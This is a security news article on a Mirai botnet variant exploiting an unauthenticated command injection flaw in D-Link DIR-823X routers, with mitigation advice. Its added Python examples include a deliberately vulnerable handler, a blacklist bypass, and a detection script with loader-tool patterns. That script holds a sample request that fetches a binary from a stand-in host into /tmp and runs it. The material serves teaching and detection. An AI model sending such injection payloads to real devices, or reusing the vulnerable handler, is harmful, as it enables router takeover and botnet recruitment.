Mirai Botnet Exploits D-Link Router Flaw CVE-2025-29635

New Mirai variant actively exploits CVE-2025-29635 command injection vulnerability in D-Link DIR-823X routers to build botnets.

22 April 2026, 22:04 (5 min read)

Last updated 22 April 2026, 23:37

Severity: High (CVSS 8.1/10)
CVE ID: CVE-2025-29635
Exploit status: Actively exploited
Patch status: Unavailable
Vendor: D-Link
Affected: D-Link DIR-823X router series, ...
Category: Vulnerabilities

Mirai Variant Nexcorium Targets D-Link Router Vulnerability

Security researchers discovered a new Mirai botnet campaign on April 22, 2026, actively exploiting CVE-2025-29635, a high-severity command injection vulnerability in D-Link DIR-823X routers. The malware variant, dubbed Nexcorium, leverages this flaw to execute arbitrary commands on vulnerable devices and recruit them into a growing botnet infrastructure.

CVE-2025-29635 lies in the web management interface of the DIR-823X. A CGI handler in the firmware takes a field from an incoming HTTP request and passes it into a command the device runs, without validating it, so anyone who can reach the interface can append shell commands to that field in a crafted request. No authentication is required, and because the web server runs as root, the injected commands execute with root privileges on the device.

The Nexcorium campaign was first identified by threat intelligence researchers monitoring botnet activity across compromised IoT devices. The Hacker News reported that the attackers are systematically scanning internet-facing D-Link routers and attempting exploitation within minutes of discovery. The malware downloads additional payloads from command-and-control servers, establishing persistent access and enabling the infected devices to participate in distributed denial-of-service attacks.

Unlike classic Mirai variants, which rely on weak or default credentials, Nexcorium targets this command injection flaw and therefore needs no credentials at all. The attack consists of POST requests to the router's web interface with shell commands embedded in a parameter field. Once a request succeeds, the malware installs itself in the device's temporary filesystem and opens a connection to remote servers for further instructions.
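The bug class behind the campaign, shown as an added Python illustration rather than D-Link's firmware (the DIR-823X's web server is native code, and its real endpoint and parameter names are not given on this page): a diagnostics handler that splices a POST field into a shell command, a blacklist "sanitizer" that still fails, and the hardened form. The parameter name target and the use of /bin/echo in place of the real diagnostic tool are assumptions chosen so the example runs offline.

```python
"""Command injection in a CGI-style diagnostics handler.

Added illustration of the bug class, not D-Link firmware code. The
parameter name 'target' and the use of /bin/echo as a stand-in for the
real diagnostic tool (ping, nslookup, ...) are assumptions so that the
example runs offline on any Linux/macOS host.
"""
import re
import subprocess
from urllib.parse import parse_qs

# Allow-list for what a diagnostics page legitimately accepts: DNS labels
# (letters, digits, hyphens; no leading/trailing hyphen) joined by dots,
# which also covers dotted-quad IPv4 addresses. \Z rather than $ so a
# trailing newline cannot sneak past the check.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\Z"
)


def _target(post_body: str) -> str:
    """Pull the 'target' field out of an application/x-www-form-urlencoded body."""
    return parse_qs(post_body).get("target", [""])[0]


def vulnerable_handler(post_body: str) -> str:
    """The bug: user input is concatenated into a command string that is
    handed to /bin/sh, so ';', '|', '&', backticks, $(...) and newlines
    inside the field all become shell syntax."""
    cmd = f"/bin/echo probing {_target(post_body)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def naive_sanitize_handler(post_body: str) -> str:
    """A blacklist 'fix' that does not work: stripping a few separators
    leaves newline, $(...) and backticks, which /bin/sh honours just as well."""
    target = _target(post_body).replace(";", "").replace("&", "").replace("|", "")
    cmd = f"/bin/echo probing {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def is_valid_target(target: str) -> bool:
    """Allow-list check: True only for a plain hostname or IPv4 literal."""
    return HOSTNAME_RE.fullmatch(target) is not None


def hardened_handler(post_body: str) -> str:
    """The fix has two independent parts: reject anything that is not a
    hostname, and invoke the tool with an argv list (no shell), so even a
    value that slipped past validation is only ever a single argument."""
    target = _target(post_body)
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return subprocess.run(["/bin/echo", "probing", target],
                          capture_output=True, text=True, check=True).stdout


# Constructed request bodies. A real loader's second command would fetch
# a binary into /tmp and execute it; 'echo INJECTED' stands in for it.
BENIGN_BODY = "target=example.com"
ATTACK_BODY = "target=example.com%3Becho+INJECTED"      # ';' separator
BYPASS_BODY = "target=example.com%0Aecho+INJECTED"      # newline separator

if __name__ == "__main__":
    print(repr(vulnerable_handler(ATTACK_BODY)))        # both commands ran
    print(repr(naive_sanitize_handler(BYPASS_BODY)))    # blacklist bypassed
    print(repr(hardened_handler(BENIGN_BODY)))
    for body in (ATTACK_BODY, BYPASS_BODY):
        try:
            hardened_handler(body)
        except ValueError as exc:
            print("hardened handler:", exc)
```

The point of the hardened version is that neither half is optional: the allow-list keeps garbage out of a tool that may itself parse its argument in surprising ways, and the argv form guarantees that whatever reaches the tool is one argument and never a shell script.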

Security firm researchers noted that the campaign shows sophisticated understanding of the D-Link firmware architecture, suggesting the threat actors have reverse-engineered the router's software to optimize their exploitation techniques. The malware includes anti-analysis features and attempts to disable other competing botnet infections on compromised devices.

D-Link DIR-823X Router Users Face Critical Exposure

The vulnerability affects every firmware release of the D-Link DIR-823X router series. D-Link designated the series end-of-life in 2024, so no firmware update fixing CVE-2025-29635 will be released. Home users, small businesses, and organizations still running these routers therefore have no vendor-supplied fix and remain exposed to immediate compromise.

Shodan internet scanning data indicates approximately 180,000 D-Link DIR-823X routers remain reachable from the internet worldwide, with the highest concentrations in North America, Europe, and Asia-Pacific. Many of these devices also retain default administrative credentials and have no firewall in front of the management interface. The credentials are irrelevant to CVE-2025-29635, which is exploitable without logging in; the exposed interface is exactly what the Nexcorium scanners look for.

The command injection vulnerability carries a CVSS score of 8.1, classified as high severity due to its network-based attack vector and the potential for complete device compromise. Successful exploitation grants attackers root-level access to the router's operating system, enabling them to monitor network traffic, redirect DNS queries, and use the device as a launching point for attacks against other network resources.

Enterprise environments using D-Link DIR-823X routers in branch offices or as backup connectivity solutions face particular risk, as compromised devices can provide attackers with persistent network access and the ability to pivot to internal systems. The botnet recruitment process typically occurs within hours of initial compromise, making rapid response critical for affected organizations.

Immediate Mitigation Steps for D-Link Router Owners

Organizations and users operating D-Link DIR-823X routers must take immediate action to prevent compromise, as no firmware patch will be released for these discontinued devices. The most effective mitigation is complete replacement with supported router models from current vendor product lines. SecurityWeek recommends prioritizing router replacement within 30 days for internet-facing deployments.

Where immediate replacement is not feasible, administrators should put network-level protections in place to reduce exposure. Disable remote management: log in to the router's web interface at its LAN address (the article gives 192.168.1.1; the default is printed on the device label), open Advanced Settings > Remote Management, set "Enable Remote Management" to "Disabled", and confirm that the "Remote Management Port" no longer answers from the WAN side.

Network administrators should also add firewall rules that drop traffic to the router's web management interface (TCP 80 and 443, plus any custom remote-management port) arriving on the WAN side. On a router that is itself the network edge, that rule has to sit on the router's WAN interface or on an upstream device; a LAN-side rule does nothing for internet-sourced requests. Change default administrative credentials immediately, using passwords of at least 12 characters mixing uppercase, lowercase, digits, and symbols. Strong credentials do not stop CVE-2025-29635, which needs no login, but they do shut out the credential-guessing Mirai variants that scan the same devices. Enable access logging if available and monitor for suspicious authentication attempts or configuration changes.

For detection, security teams should scan their networks for D-Link DIR-823X devices with network discovery tools and keep an inventory of all internet-facing router infrastructure. Help Net Security suggests segmenting potentially vulnerable IoT devices away from critical business systems and watching network traffic for the infection chain described above: a burst of POST requests to the management interface from an unfamiliar address, followed by the router itself fetching a binary from an unknown host and then holding a persistent connection to it.
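A detection heuristic for the traffic pattern this section describes, as an added Python example (not from the article and not vendor tooling): it parses raw HTTP requests captured by a proxy or IDS placed in front of the router, decodes the form fields, and flags requests whose parameters carry shell separators or loader commands, recording whether the request presented any session credential. The /cgi-bin/diag.cgi path, the target parameter, and the two sample requests are constructed for illustration; the real DIR-823X endpoint is not given on this page.

```python
"""Flag command-injection attempts against a router's web management
interface in captured HTTP requests.

Added example, not from the article or any vendor tool. It assumes raw
HTTP/1.1 requests exported from a proxy or IDS sitting in front of the
router. The CGI path, parameter name and the two sample requests are
constructed for illustration and are not the DIR-823X's real endpoints.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote_plus

# Tokens that turn one shell argument into a second command.
SHELL_META_RE = re.compile(r"[;|&`\n]|\$\(")
# Loader vocabulary: fetch a binary into a writable tmpfs, mark it
# executable, run it. This is how IoT botnet droppers typically stage.
LOADER_RE = re.compile(r"\b(?:wget|curl|tftp|busybox|chmod)\b|/tmp\b", re.I)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers
    and the decoded form parameters from both query string and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    params: dict[str, list[str]] = {}
    for source in (query, body):
        for name, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(name, []).extend(values)
    return {"method": method, "path": path, "headers": headers, "params": params}


def analyze(raw: str) -> dict:
    """Return a finding for one request: whether it looks like an injection
    attempt, why, and whether it carried any session credential."""
    req = parse_request(raw)
    reasons = []
    for name, values in req["params"].items():
        for value in values:
            # Decode once more so a double-encoded payload (%253B) is seen;
            # a legitimate '+' turning into a space does not matter here.
            decoded = unquote_plus(value)
            if SHELL_META_RE.search(decoded):
                reasons.append(f"shell metacharacter in parameter {name!r}")
            if LOADER_RE.search(decoded):
                reasons.append(f"loader command in parameter {name!r}")
    authenticated = "cookie" in req["headers"] or "authorization" in req["headers"]
    return {
        "path": req["path"],
        "method": req["method"],
        "suspicious": bool(reasons),
        "authenticated": authenticated,
        "reasons": sorted(set(reasons)),
    }


def scan(requests: list[str]) -> list[dict]:
    """Run analyze() over a capture and keep only the suspicious findings."""
    return [f for f in (analyze(r) for r in requests) if f["suspicious"]]


# Constructed samples. Addresses are RFC 5737 documentation ranges; the
# attack body is a typical drop-to-tmpfs loader chain, URL-encoded as a
# browser form would send it.
ATTACK_REQ = (
    "POST /cgi-bin/diag.cgi HTTP/1.1\r\n"
    "Host: 203.0.113.10\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "target=127.0.0.1%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2F198.51.100.7%2Fbins%2Fmips"
    "%3Bchmod+777+mips%3B.%2Fmips"
)
BENIGN_REQ = (
    "POST /cgi-bin/diag.cgi HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Cookie: session=0f3a9c\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "target=example.com"
)

if __name__ == "__main__":
    for finding in scan([BENIGN_REQ, ATTACK_REQ]):
        print(finding)
```

Because the flaw needs no login, the finding worth paging on is an unauthenticated POST to the management interface whose parameters carry shell syntax. String matching like this is a triage signal rather than a verdict, and it belongs behind the network-level blocking above, not in place of it.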

Frequently Asked Questions

How do I check if my D-Link router is vulnerable to CVE-2025-29635?
Check the model name on the device label or on the status page of the web interface (192.168.1.1 per the article). All D-Link DIR-823X models are vulnerable regardless of firmware version; D-Link discontinued the series in 2024 with no security patches planned.

Can I patch CVE-2025-29635 on my D-Link DIR-823X router?
No patch is available for CVE-2025-29635 because D-Link discontinued the DIR-823X series in 2024. The only effective protection is replacing the router with a current model from a supported product line.

What should I do if my D-Link router is already compromised by Mirai?
Immediately disconnect the router from the internet and perform a factory reset. Because the malware runs from the device's temporary filesystem, the reset removes the running payload. Change all default passwords before reconnecting. The device remains vulnerable, though, and an internet-facing unit will be rescanned and reinfected within minutes, so replacement with a supported router model is strongly recommended.
